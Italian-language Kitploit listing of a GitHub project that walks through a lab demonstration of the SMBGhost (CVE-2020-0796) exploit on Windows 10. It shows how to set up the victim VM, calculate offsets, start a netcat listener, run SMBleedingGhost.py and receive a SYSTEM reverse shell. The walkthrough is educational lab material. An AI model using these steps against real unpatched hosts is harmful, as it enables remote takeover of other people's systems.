Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-0796-SMBGhost-Exploit-Demo — Exploit proof-of-concept educativo per CVE-2020-0796 (SMBGhost) che dimostra RCE pre-autenticazione su Windows SMBv3. Include configurazione di laboratorio passo-passo, calcolo dell'offset ed esecuzione di reverse shell per formazione sulla sicurezza informatica controllata. | Kitploit
Strumenti/GitHubGitHub/tdevworks/cve-2020-0796-smbghost-exploit-demo
Analisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneStrumento di Accesso RemotoSviluppo PayloadBinary ExploitationLab e Pratica
GitHub
tdevworks/cve-2020-0796-smbghost-exploit-demo

CVE-2020-0796-SMBGhost-Exploit-Demo

Exploit proof-of-concept educativo per CVE-2020-0796 (SMBGhost) che dimostra RCE pre-autenticazione su Windows SMBv3. Include configurazione di laboratorio passo-passo, calcolo dell'offset ed esecuzione di reverse shell per formazione sulla sicurezza informatica controllata.

Vedi Repository
351 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2020-0796 Exploit Demo (SMBGhost)

Questo progetto dimostra un proof-of-concept (PoC) dell'exploit di CVE-2020-0796, noto anche come SMBGhost - una vulnerabilità critica di RCE pre-autenticazione che colpisce i sistemi Windows 10 e Windows Server che utilizzano SMBv3. È stato sviluppato come parte di un progetto scolastico di cybersecurity. Tutto il merito del codice dell'exploit va a ZecOps. L'ho solo utilizzato e adattato per scopi educativi per dimostrare lo sfruttamento di CVE-2020-0796 in un ambiente di laboratorio controllato.

Requisiti per la Demo

Per replicare questa dimostrazione, è necessaria la seguente configurazione:

Macchina Attaccante

  • VirtualBox (usando NATNetwork per il networking delle VM)
  • Windows 10 (qualsiasi versione recente)
  • Python 3.x (aggiunto al PATH di sistema)
  • Netcat (incluso con Nmap o installato separatamente)
  • Script dell'exploit dal PoC di GitHub:
    SMBleedingGhost.py by ZecOps

Macchina Vittima

  • VirtualBox (stessa configurazione NATNetwork)
  • Windows 10 versione 1903, release 19H1
    Build 18362.356 – 2019.09, Edizione Home o Pro (x64)
  • Windows Firewall disattivato (per consentire l'accesso alla porta 445)
  • Script di calcolo degli offset dal PoC di GitHub:
    calc_target_offsets.bat by ZecOps
  • Dimostrazione: Exploit Passo per Passo

    Passo 1: Recuperare gli Indirizzi IP di Entrambe le VM

    1. Avvia il Prompt dei comandi su entrambe le macchine virtuali Attaccante e Vittima.

    2. Esegui il seguente comando su ogni macchina:

      root@kitploit:~
      ipconfig
      

    Screenshot 2025-05-16 172329

    1. Prendi nota degli indirizzi IP delle VM — ti serviranno nei passaggi successivi.

    Passo 2: Calcolare gli Offset sulla VM Vittima

    1. Sulla VM Vittima, naviga fino alla cartella CVE-2020-0796-RCE-POC-master.
    2. Fai doppio clic per eseguire lo script: calc_target_offsets.bat
    • Questo genererà gli offset di memoria necessari per l'exploit.
    • Tieni aperta la finestra e prendi nota dei valori mostrati — ti serviranno nel passaggio successivo.

    Screenshot 2025-05-16 172350


    Passo 3: Aggiornare lo Script dell'Exploit sulla VM Attaccante

    1. Sulla VM Attaccante, apri la stessa cartella CVE-2020-0796-RCE-POC-master.
    2. Fai clic con il tasto destro su SMBleedingGhost.py e aprilo con Blocco note.
    3. Nel file SMBleedingGhost.py, scorri verso il basso e individua la sezione che inizia con OFFSETS = {.
    4. Sostituisci i valori di offset esistenti con quelli ottenuti dalla VM Vittima.
    5. Salva il file dopo la modifica.
    6. Ora puoi chiudere la finestra degli offset sulla VM Vittima.

    Screenshot 2025-05-16 172403


    Passo 4: Avviare il Listener Netcat sulla VM Attaccante

    Apri un nuovo Prompt dei comandi ed esegui:

    root@kitploit:~
    ncat -lvp 4321
    
    • Questo imposta un listener sulla porta 4321 per ricevere una reverse shell dalla VM Vittima dopo uno sfruttamento riuscito.
    • Puoi cambiare il numero di porta se necessario.

    Screenshot 2025-05-16 172419


    Passo 5: Eseguire l'Exploit dalla VM Attaccante

    1. Apri un altro Prompt dei comandi e naviga fino alla directory del PoC (io l'ho salvata sul Desktop):
    root@kitploit:~
    cd Desktop
    cd CVE-2020-0796-RCE-POC-master
    dir
    
    1. Esegui l'exploit con gli IP e la porta appropriati:
    root@kitploit:~
    python SMBleedingGhost.py <target_ip> <attacker_ip> <port>
    

    Screenshot 2025-05-16 172450

    Esempio utilizzato in questa demo:

    root@kitploit:~
    python SMBleedingGhost.py 192.168.18.61 192.168.18.62 4321
    
    • 192.168.18.61: IP della VM Vittima
    • 192.168.18.62: IP della VM Attaccante
    • 4321: Porta utilizzata nel listener netcat

    Esito dello Sfruttamento

    In caso di successo, la finestra di netcat mostrerà:

    root@kitploit:~
    Microsoft Windows [Version 10.0.18362.356]
    (c) 2019 Microsoft Corporation. All rights reserved.
    
    C:\Windows\system32>
    

    Questo conferma che:

    • La VM Vittima è stata sfruttata
    • La VM Attaccante ora dispone di privilegi a livello di sistema

    Puoi verificare l'accesso eseguendo:

    root@kitploit:~
    whoami
    

    Questo restituirà:

    root@kitploit:~
    whoami
    nt authority\system
    

    Ciò significa che la VM Attaccante ora dispone di privilegi a livello di sistema sulla VM Vittima.

    Screenshot 2025-05-16 172512

    Puoi anche eseguire:

    root@kitploit:~
    ipconfig
    

    Per verificare che stai interagendo con la rete della VM Vittima.

    Screenshot 2025-05-16 172550

    Nota: La VM Vittima potrebbe bloccarsi dopo lo sfruttamento. Se accade, puoi riavviarla. La sessione dell'attaccante dovrà essere ristabilita dopo il riavvio.

    Riconoscimenti

    Questa dimostrazione si basa sul proof-of-concept pubblicamente disponibile sviluppato da ZecOps.

    Tutto il merito del codice dell'exploit va a ZecOps. L'ho solo utilizzato e adattato per scopi educativi per dimostrare lo sfruttamento di CVE-2020-0796 in un ambiente di laboratorio controllato.

    Riferimenti

    • CVE-2020-0796 Remote Code Execution POC

    Autore

    @tdevworks

    Disclaimer

    Questa repository è stata creata solo per scopi educativi.

    Tutti gli strumenti, gli script e le tecniche dimostrati sono pensati per aiutare a comprendere le vulnerabilità di cybersecurity in un ambiente di laboratorio controllato. Non tentare di utilizzare alcuno dei materiali forniti su sistemi o reti che non possiedi o per i quali non hai un permesso esplicito di test.

    Qualsiasi uso improprio del software non sarà responsabilità dell'autore.

    Scarica lo strumento